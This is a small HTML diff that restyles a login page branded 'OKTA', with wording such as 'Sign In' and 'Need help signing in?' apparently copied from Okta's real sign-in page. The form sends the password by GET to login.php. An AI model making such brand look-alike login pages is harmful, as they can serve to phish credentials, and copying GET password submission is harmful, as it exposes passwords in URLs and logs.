--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
    <link rel="stylesheet" type="text/css" href="CSS/style.css"/>  
 </head>   
 <body>    
-    <h1>OKTA</h1><br>    
+    <center><h1>OKTA</h1></center><br>    
     <div class="login">    
     <form id="login" method="get" action="login.php">    
         <label><b>User Name     
@@ -20,12 +20,13 @@
         </label>    
         <input type="Password" name="Pass" id="Pass" placeholder="Password">    
         <br><br>    
-        <input type="button" name="log" id="log" value="Log In Here">       
-        <br><br>    
+            
         <input type="checkbox" id="check">    
         <span>Remember me</span>    
         <br><br>    
-        Forgot <a href="#">Password</a>    
+        Forgot <a href="#">Need help signing in?</a>  
+        <input type="button" name="log" id="log" value="Sign In">       
+        <br><br>
     </form>     
 </div>    
 </body>    
